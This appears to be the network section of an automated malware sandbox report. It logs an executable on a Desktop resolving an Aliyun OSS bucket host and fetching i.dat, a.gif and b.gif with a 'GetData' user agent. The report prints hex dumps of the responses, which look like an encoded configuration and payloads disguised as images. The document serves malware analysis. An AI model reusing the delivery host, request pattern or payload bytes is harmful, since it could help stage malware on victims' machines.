                        Jan 5, 2025 10:05:42.849657059 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.119846106 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.120076895 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.120739937 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.120745897 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.120907068 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.120912075 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.464728117 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.464746952 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.464839935 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.464839935 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.464854002 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.464915037 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.464921951 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.464929104 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.464956999 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.465001106 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.466525078 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.466617107 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.470669031 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.470747948 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.555021048 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.555186033 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.555193901 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.555207014 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.555249929 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.555249929 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.555986881 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.556071997 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.556078911 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.556093931 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.556149960 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.556314945 CET49973443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.556334019 CET4434997339.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.571440935 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.571474075 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:44.571562052 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.571840048 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:44.571851969 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:45.880980968 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:45.881109953 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:45.881628990 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:45.881635904 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:45.881814003 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:45.881819010 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:46.256890059 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:46.256895065 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:46.257013083 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:46.257028103 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:46.257103920 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:46.257333040 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:46.257390022 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:46.257395983 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:46.257436991 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:46.257441998 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:46.257453918 CET4434997439.103.20.34192.168.2.7
                        Jan 5, 2025 10:05:46.257487059 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:46.257520914 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:46.258383036 CET49974443192.168.2.739.103.20.34
                        Jan 5, 2025 10:05:46.258394957 CET4434997439.103.20.34192.168.2.7
                        TimestampSource PortDest PortSource IPDest IP
                        Jan 5, 2025 10:05:26.103096008 CET5154853192.168.2.71.1.1.1
                        Jan 5, 2025 10:05:26.935035944 CET53515481.1.1.1192.168.2.7
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Jan 5, 2025 10:05:26.103096008 CET192.168.2.71.1.1.10xef49Standard query (0)msd1sq.oss-cn-beijing.aliyuncs.comA (IP address)IN (0x0001)false
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Jan 5, 2025 10:05:26.935035944 CET1.1.1.1192.168.2.70xef49No error (0)msd1sq.oss-cn-beijing.aliyuncs.comsc-257a.cn-beijing.oss-adns.aliyuncs.comCNAME (Canonical name)IN (0x0001)false
                        Jan 5, 2025 10:05:26.935035944 CET1.1.1.1192.168.2.70xef49No error (0)sc-257a.cn-beijing.oss-adns.aliyuncs.comsc-257a.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comCNAME (Canonical name)IN (0x0001)false
                        Jan 5, 2025 10:05:26.935035944 CET1.1.1.1192.168.2.70xef49No error (0)sc-257a.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com39.103.20.34A (IP address)IN (0x0001)false
                        • msd1sq.oss-cn-beijing.aliyuncs.com
                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.74996839.103.20.344436952C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        TimestampBytes transferredDirectionData
                        2025-01-05 09:05:28 UTC111OUTGET /i.dat HTTP/1.1
                        User-Agent: GetData
                        Host: msd1sq.oss-cn-beijing.aliyuncs.com
                        Cache-Control: no-cache
                        2025-01-05 09:05:28 UTC557INHTTP/1.1 200 OK
                        Server: AliyunOSS
                        Date: Sun, 05 Jan 2025 09:05:28 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 512
                        Connection: close
                        x-oss-request-id: 677A4B585B40CC3338C58104
                        Accept-Ranges: bytes
                        ETag: "7E4165B1411CF0914B7DB88CBD5C6A68"
                        Last-Modified: Sat, 04 Jan 2025 09:23:34 GMT
                        x-oss-object-type: Normal
                        x-oss-hash-crc64ecma: 6704561915333262350
                        x-oss-storage-class: Standard
                        x-oss-ec: 0048-00000113
                        Content-Disposition: attachment
                        x-oss-force-download: true
                        Content-MD5: fkFlsUEc8JFLfbiMvVxqaA==
                        x-oss-server-time: 4
                        2025-01-05 09:05:28 UTC512INData Raw: 07 1b 1b 1f 6c 25 30 30 5d 43 54 01 72 70 2f 6e 1d 1d 43 0d 63 20 6f 68 01 02 01 06 61 28 67 6a 03 13 1f 04 67 77 2a 67 08 0a 48 06 28 61 6f 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 60 08 14 14 10 63 2a 3f 3f 52 4c 5b 0e 7d 7f 20 61 12 12 4c 02 6c 2f 60 67 0e 0d 0e 09 6e 27 68 65 0c 1c 10 0b 68 78 25 68 07 05 47 0a 24 6d 63 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 6c 04 18 18 1c 6f 26 33 33 5e 40 57 02 71 73 2c 6d 1e 1e 40 0e 60 23 6c 6b 02 01 02 05 62 2b 64 69 00 10 1c 07 64 74 29 64 0b 09 4b 07 29 60 6e 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 61 09 15 15 11 62 2b 3e 3e 53 4d 5a 0f 7c 7e 21
                        Data Ascii: l%00]CTrp/nCc oha(gjgw*gH(ao`````````````````````````````````c*??RL[} aLl/`gn'hehx%hG$mclllllllllllllllllllllllllllllllllo&33^@Wqs,m@`#lkb+didt)dK)`naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab+>>SMZ|~!


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.74996939.103.20.344436952C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        TimestampBytes transferredDirectionData
                        2025-01-05 09:05:30 UTC111OUTGET /a.gif HTTP/1.1
                        User-Agent: GetData
                        Host: msd1sq.oss-cn-beijing.aliyuncs.com
                        Cache-Control: no-cache
                        2025-01-05 09:05:30 UTC546INHTTP/1.1 200 OK
                        Server: AliyunOSS
                        Date: Sun, 05 Jan 2025 09:05:30 GMT
                        Content-Type: image/gif
                        Content-Length: 135589
                        Connection: close
                        x-oss-request-id: 677A4B5A6D28FD343391AF93
                        Accept-Ranges: bytes
                        ETag: "0DDD3F02B74B01D739C45956D8FD12B7"
                        Last-Modified: Sat, 04 Jan 2025 09:22:47 GMT
                        x-oss-object-type: Normal
                        x-oss-hash-crc64ecma: 8642451798640735006
                        x-oss-storage-class: Standard
                        x-oss-ec: 0048-00000104
                        Content-Disposition: attachment
                        x-oss-force-download: true
                        Content-MD5: Dd0/ArdLAdc5xFlW2P0Stw==
                        x-oss-server-time: 27
                        2025-01-05 09:05:30 UTC3550INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                        Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                        2025-01-05 09:05:30 UTC4096INData Raw: 92 94 95 15 58 67 66 8f 0d ac 9c 9e d7 25 61 ea 28 7c d1 e2 ef 25 bc 8d ce ad ad e6 24 78 4e a7 6d 84 b4 b6 ff 3d 79 ce ae f0 30 fa 9b e0 89 4f 97 e0 f5 8e 4a c5 b1 9a ca cc 32 1e 44 28 99 59 18 2b c0 75 e7 d9 d9 59 24 df a8 d2 97 6d ad c6 d3 0c 89 da e7 e8 02 e8 d8 2c a5 6b 2f b8 7a 4e d7 b4 f7 f6 f7 b0 72 66 df ac ff fe ff 48 88 07 bd b1 04 06 08 8c db 0a 0b 0c 45 83 1a 91 41 13 13 5c 9e de e8 0d 61 2a 1a 1c 55 95 12 81 94 23 23 6c a8 33 5d 78 28 2a 63 a5 28 4d 9a 31 31 cd 26 69 05 37 37 70 b2 37 bd 89 3c 3e 77 cd 54 35 13 45 45 0e ce 4d 39 ff 4a 4c b2 5b 0d 60 50 52 1b df 58 3d e2 59 59 12 d6 49 39 0e 5e 60 29 eb 66 89 d1 67 67 97 7c 4d 5b 6d 6d 26 e4 7d 21 c7 72 74 3d fb 62 21 29 7b 7b 34 f4 7b 65 35 80 82 7c 91 89 b6 86 88 c1 01 86 b9 38 8f 8f d8 1c
                        Data Ascii: Xgf%a(|%$xNm=y0OJ2D(Y+uY$m,k/zNrfHEA\a*U##l3]x(*c(M11&i77p7<>wT5EEM9JL[`PRX=YYI9^`)fgg|M[mm&}!rt=b!){{4{e5|8
                        2025-01-05 09:05:30 UTC4096INData Raw: 6c 81 49 b6 96 98 1c 6c ee db d5 13 d3 84 f1 5d b6 e1 84 a7 a7 2b 69 ab e7 cf 4d e3 ac 54 4e a7 ed 94 b4 b6 fa 33 7d f2 30 74 8e 6c 40 d5 d9 e2 c2 c4 8d 43 07 80 42 22 bf df 85 43 9b f4 81 9f 58 10 9d 5d 1f 30 41 ec db dc 91 55 32 ac 68 89 d3 6f e0 e9 41 e9 e9 a2 66 e1 81 4b ee f0 ca 0c 7a b7 c9 f9 b8 06 06 ef 75 dc fc fe b7 8b 0c 95 97 05 05 4a 8c a4 2d 7a 03 0c 0d 42 84 b4 35 6a 1b 14 15 5e 94 e1 e6 52 90 b0 39 86 17 20 21 57 69 6c ae 23 a5 8d 28 2a 67 a7 20 5d 8a 31 31 7e b8 31 61 93 36 38 b2 2f 4d 99 3c 3e 86 41 41 42 43 08 cc 32 63 60 01 c3 0f 68 6d b1 5a 51 f4 53 53 1c de 5b 15 cc 58 5a de 9c d6 ae 16 6f 29 ad e6 a4 2d ef 6a 59 fd 6b 6b 14 73 22 e2 3c 55 4e 36 47 b5 cc f9 6b 79 7a 33 bb 39 5a 5f 84 81 82 83 7b 90 cd 22 89 89 01 7b c4 00 83 45 34 90
                        Data Ascii: lIl]+iMTN3}0tl@CB"CX]0AU2hoAfKzuJ-zB5j^R9 !Wil#(*g ]11~1a68/M<>AABC2c`hmZQSS[XZo)-jYkks"<UN6Gkyz39Z_{"{E4
                        2025-01-05 09:05:30 UTC4096INData Raw: 75 9b 94 96 df 13 d5 be cb 63 88 7d 90 a1 a1 ea 2e a9 c1 30 a6 a8 56 bf 6d bc ac ae 2a 4f c9 af 32 4f 3f a5 b7 b8 cd af 3a 47 36 ad bf c0 b5 cf 8b 4f 10 7f c7 cc c9 ca 23 79 3b 31 30 5b 16 9a 58 68 f1 76 d7 d8 d9 92 58 18 bd 9f 82 a1 bd bc be bf 26 2a 2b 24 25 26 27 20 21 22 23 3c 3d 3e 3f 38 bd 7f ab dc e9 b2 72 90 d9 e6 a8 48 82 ee 33 8f c4 4f 8c d0 41 81 f1 8f e5 0a 84 f9 1e 96 c1 14 15 16 94 e0 18 15 9f b1 1d 1e 1f 68 ac 2f 15 b1 24 26 6f a1 5d 0e 6b d3 38 75 3f 31 31 7a b8 39 51 b2 36 38 71 b9 c2 c3 48 6b 73 cb 4c 1d d6 45 45 0a cc 4d 09 df 4a 4c c6 5b 2d c5 50 52 1b d9 50 15 d3 59 59 e3 5a 5c 5d 5e 17 e9 25 46 4b 2c ee 63 25 fd 68 6a 23 e5 29 4a 4f 8f 64 ad e7 75 75 3e fc 75 59 fe 7a 7c f6 8e 37 03 49 7d 06 72 cd 89 cf 40 0c 7c c3 05 80 85 0b 91 91
                        Data Ascii: uc}.0Vm*O2O?:G6O#y;10[XhvX&*+$%&' !"#<=>?8rH3OAh/$&o]k8u?11z9Q68qHksLEEMJL[-PRPYYZ\]^%FK,c%hj#)JOduu>uYz|7I}r@|
                        2025-01-05 09:05:30 UTC4096INData Raw: b7 ac d4 2f 87 98 99 9a d3 17 d5 96 ac 72 e9 2b ff 80 8d ee 2e e4 8d 96 e3 27 e1 8a 9f 77 f5 96 8b b5 b5 b6 b7 7f fd 9e ff be bd be bf 88 48 9e e7 e4 3a d3 4d 37 c9 ca 4e 0c b8 c8 30 c5 d1 d2 d2 d4 9d 5d 9b fc e9 25 ce c1 dd df df 27 e4 4d 65 e5 e5 e7 e7 e8 e9 d9 22 04 89 21 10 0f b9 7f fe 91 70 f7 f7 07 ec 75 fb fd fd b6 7c 3d 96 76 02 04 fa 4a 8a 05 31 fb f4 f3 41 87 02 81 94 13 13 d3 10 81 92 19 19 19 3b 1c 1d 56 96 3d 49 a7 22 24 6d af 3a a9 ac 2b 2b 59 16 6b 1c f0 79 bf 36 51 41 37 37 82 3a 1a 3b 3c 75 b7 7b 64 69 03 ce 0c 44 0e ce 14 6d 6a b4 59 49 cb 4e 50 19 d9 46 11 21 57 57 11 da 92 a4 d9 9d 17 50 28 b1 2a ea 71 51 12 66 68 21 e7 66 81 e9 6f 6f 8f 64 8d 8c 74 75 9e bd 90 86 85 33 f1 31 5a 2f b3 53 c3 3b 98 84 86 87 60 a1 ee 8b 8c c5 03 c3 b4 c1
                        Data Ascii: /r+.'wH:M7N0]%'Me"!pu|=vJ1A;V=I"$m:++Yky6QA77:;<u{diDmjYINPF!WWP(*qQfh!foodtu31Z/S;`
                        2025-01-05 09:05:30 UTC4096INData Raw: b7 d4 16 36 5f 98 99 9a 66 24 62 61 60 df e9 29 d7 80 cd ee 24 6c f9 f5 68 e4 28 58 db 05 f9 39 f7 90 85 fe 3e e4 9d da 38 c4 a9 be ca 84 a7 a4 a5 54 ca 71 d8 ae 4a 31 8a be c7 a8 4c 2b 8b a5 d7 b2 56 15 f7 d7 6e dc bd e1 9c de ad ea 87 df b9 e4 92 e2 81 ed c9 ea a3 6f 2a ec a7 73 37 f0 95 71 2e 82 b6 9e c2 22 8f 34 16 c4 99 66 91 64 65 94 0a b1 08 40 84 5e 2f 3c e5 dd 26 10 11 1d a4 1a 5d 9b 43 3c 29 7c 90 c4 55 9d d8 22 c9 9d 0a 24 25 6e a4 ee 2b 4c ae f7 59 2b 49 0b e9 46 e2 78 be 6a 13 78 36 8d f3 33 8a fd 77 cb 1d 66 23 6f 84 c6 3b 6c 01 4a 3f 44 0c cd ec 98 51 52 53 a9 1d dd 23 7c 31 12 d8 98 0d 01 9c ac ad ae af a8 2d e5 8b 50 ea 57 ae 06 6c 6e 6f 3c fa bb 7c f1 f7 76 77 78 31 ff b2 09 50 96 5d ad 81 82 c6 b7 4c c3 b4 48 ba 58 b8 45 c5 49 cb b4 b1
                        Data Ascii: 6_f$ba`)$lh(X9>8TqJ1L+Vno*s7q."4fde@^/<&]C<)|U"$%n+LY+IFxjx63wf#o;lJ?DQRS#|1-PWlno<|vwx1P]LHXEI
                        2025-01-05 09:05:30 UTC4096INData Raw: ce d5 c9 c9 c9 c5 5a 56 57 50 51 52 53 6c 6d 6e 6f 68 e5 f5 ef 2b 45 9a e3 29 64 e6 24 69 be 36 d4 b5 b5 b6 ff 3d 6b b5 3f e2 bc be bf 85 f2 10 8e 41 05 8a 4c 11 bd e2 8a c3 7a ce a9 55 11 a6 cc 95 6f d4 d7 d8 d9 93 e0 0e d2 58 25 e0 e1 e2 af 69 bc e4 81 61 e8 8c aa 2b ee d4 ef bd f2 28 be 71 3c 82 ad 9e b8 79 c2 fc 89 ad 99 66 91 64 65 94 4c 85 c5 09 45 31 d9 03 8e c5 0f 10 11 53 1c a3 14 5f 94 d9 1b 53 98 df 1f 78 5e a9 62 dc 45 65 a6 1f 27 5d f2 6b 24 9b 6c d0 49 0d 1e 32 47 29 53 0b 6b 38 4d 2d 72 bf ff 3f 73 7b 93 4d c0 d1 45 46 47 2e 08 8d 48 10 4d 07 cc 93 53 1a d8 18 71 36 1f dd 90 2e 73 3a de 67 5f 14 43 04 05 f4 2c e5 a5 69 25 51 b9 1f 02 61 d8 71 39 f1 b2 76 3c f5 b4 7a 1f 3b f2 3f 83 18 fc b9 81 f7 62 cc 0e ca a3 e0 c1 0f 42 f8 cb 81 38 91 f7
                        Data Ascii: ZVWPQRSlmnoh+E)d$i6=k?ALzUoX%ia+(q<yfdeLE1S_Sx^bEe']k$lI2G)Sk8M-r?s{MEFG.HMSq6.s:g_C,i%Qaq9v<z;?bB8
                        2025-01-05 09:05:30 UTC4096INData Raw: db 17 55 b6 de 1b 71 9b ee 4c d5 15 1d f8 a0 a2 a3 54 26 26 c7 a9 a9 aa aa 6f 61 62 63 7c 7d 7e 7f 78 fd 33 7e b7 3d 2c bb bc bd 4e 3c c1 3e 8a 48 45 d5 c7 c7 c8 81 4f 0b b8 c9 3e 4c d0 2e 9a 58 55 f5 d7 d7 d8 91 5f 1b a8 d9 2e 5c e0 1e aa 68 65 fd e7 e7 e8 a1 6f 2b 98 e9 1e 6c f0 0e ba 78 75 c5 f7 f7 f8 b1 7f 3b 88 f9 0e 7c 00 fe 4a 8e 45 5d 47 bf 0e 09 0a 0b 40 80 03 fd 24 10 12 75 84 59 2f 5f e8 6d 16 53 97 0d 56 9a f2 55 26 d3 a7 27 d9 6f ab 51 d2 2b 58 20 66 a4 60 39 7a b6 e6 41 32 c7 bb 3b c5 73 bf fd 1e 76 c3 a9 43 36 94 0d cd c6 10 48 4a 4b bc ce ce 2f 51 51 52 ac 1c de 97 94 94 95 96 97 90 91 92 93 ac ad ae af a8 25 35 2f eb 85 4a 23 e9 bf 26 e4 aa 05 37 3b f1 bc 02 37 34 f2 6b 37 47 af 0a 50 c8 08 93 cb 0f 4f 6e 0d 76 76 75 c6 09 5f fa 90 d9 1a
                        Data Ascii: UqLT&&oabc|}~x3~=,N<>HEO>L.XU_.\heo+lxu;|JE]G@$uY/_mSVU&'oQ+X f`9zA2;svC6HJK/QQR%5/J#&7;74k7GPOnvvu_
                        2025-01-05 09:05:30 UTC4096INData Raw: 56 1f 5a 7e 3d d3 99 9a d3 17 d6 8e 14 50 ae 14 e7 80 95 2e a6 41 2a aa ab ac e5 25 db 94 f1 31 7a 94 36 7e 48 31 f2 a2 f3 37 e1 9a f7 88 42 06 e3 9b 06 45 38 37 bd e9 48 33 33 ba d1 98 5a 15 9b 5f 1a 9e 5a cd d1 82 da dc 5e 3e c0 a8 20 1b e6 ac 8e 26 bf a0 ea ee 21 07 ea a6 62 f5 71 d8 f2 f4 03 b6 ff d8 8d e9 c8 2e 76 31 bb 8d 43 00 eb d9 44 06 07 40 8a f2 f4 78 2b 46 84 5b 01 98 57 30 25 9e 16 f3 0f a7 1a 1c 1d 1e 57 ad 75 06 13 af ea 62 ac ed c1 3d 60 2c 2d a5 df 0b c4 46 3a b7 7e 2e 17 bb f1 c5 d0 39 32 88 7b 64 71 0a c8 28 61 7e 0f c3 3d 6e 0b 04 c6 12 6b 18 19 d1 97 74 0a 95 9b 94 95 96 97 90 91 92 93 ac ad ae af a8 2d ef 3b 4c 79 3c 23 ef 81 0e 22 f5 b8 3f f8 a5 3c fd 87 30 f2 a0 37 f7 a4 0b 50 68 a1 7f 7c 7b c0 b5 4e cd ba 4a 4c 8c 9b 8e 8f 90 a2
                        Data Ascii: VZ~=P.A*%1z6~H17BE87H33Z_Z^> &!bq.v1CD@x+F[W0%Wub=`,-F:~.92{dq(a~=nkt-;Ly<#"?<07Ph|{NJL
                        2025-01-05 09:05:30 UTC4096INData Raw: 65 57 94 e2 9f d0 12 55 73 09 58 61 60 e8 2a 65 eb 2f f9 82 97 e0 2a 6e 8b f3 6e 62 63 7c 7d 7e 7f 78 f9 3b f6 a9 f1 39 79 ad f1 95 7d a6 51 a4 a5 54 ca 70 cd 8a c6 7c cf ce e6 06 ba d8 99 51 11 d5 50 16 a2 34 5c 13 d4 48 1d 1d 13 2c 2d 2e 2f 28 ad 6f ea 01 c2 eb eb 2f 21 22 23 3c 3d 3e 3f 38 b5 a5 bf 7b 15 da b3 77 24 b6 74 0d d1 29 02 04 ed 1d e4 f7 f6 42 8e cc 79 1a 47 9b da ed c3 91 d5 62 1c a0 18 1a 1b 1c 55 9d db 00 7a e1 10 e4 6d a5 e3 08 72 e9 e7 e0 e1 e2 e3 fc fd fe ff f8 75 65 7f bb d5 1a 73 bf c4 de 77 cb 98 4d c4 df 45 46 47 00 c0 3e 6f 7c 05 cb 86 ee 50 52 53 54 1d 59 12 a9 11 d3 27 78 65 38 39 f0 07 04 05 f4 2d ed 6a d9 59 6b 6b 24 e8 a7 1a 50 99 7d 77 74 75 cf 69 78 79 7a 93 b9 7c 7e 7f 39 7e 82 83 84 6d 4d 74 77 76 c2 00 81 01 be 8e 90 dd
                        Data Ascii: eWUsXa`*e/*nnbc|}~x;9y}QTp|QP4\H,-./(o/!"#<=>?8{w$t)ByGbUzmrueswMEFG>o|PRSTY'xe89-jYkk$P}wtuixyz|~9~mMtwv


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.74997039.103.20.344436952C:\Users\user\Desktop\2b687482300.6345827638.08.exe
                        TimestampBytes transferredDirectionData
                        2025-01-05 09:05:32 UTC111OUTGET /b.gif HTTP/1.1
                        User-Agent: GetData
                        Host: msd1sq.oss-cn-beijing.aliyuncs.com
                        Cache-Control: no-cache
                        2025-01-05 09:05:32 UTC547INHTTP/1.1 200 OK
                        Server: AliyunOSS
                        Date: Sun, 05 Jan 2025 09:05:32 GMT
                        Content-Type: image/gif
                        Content-Length: 125333
                        Connection: close
                        x-oss-request-id: 677A4B5C7A62AC3134E2C06D
                        Accept-Ranges: bytes
                        ETag: "2CA9F4AB0970AA58989D66D9458F8701"
                        Last-Modified: Sat, 04 Jan 2025 09:22:48 GMT
                        x-oss-object-type: Normal
                        x-oss-hash-crc64ecma: 10333201072197591521
                        x-oss-storage-class: Standard
                        x-oss-ec: 0048-00000104
                        Content-Disposition: attachment
                        x-oss-force-download: true
                        Content-MD5: LKn0qwlwqliYnWbZRY+HAQ==
                        x-oss-server-time: 24
                        2025-01-05 09:05:32 UTC3549INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10
                        Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
                        2025-01-05 09:05:32 UTC4096INData Raw: 5e 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19
                        Data Ascii: ^_X$pdddefg`abc|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
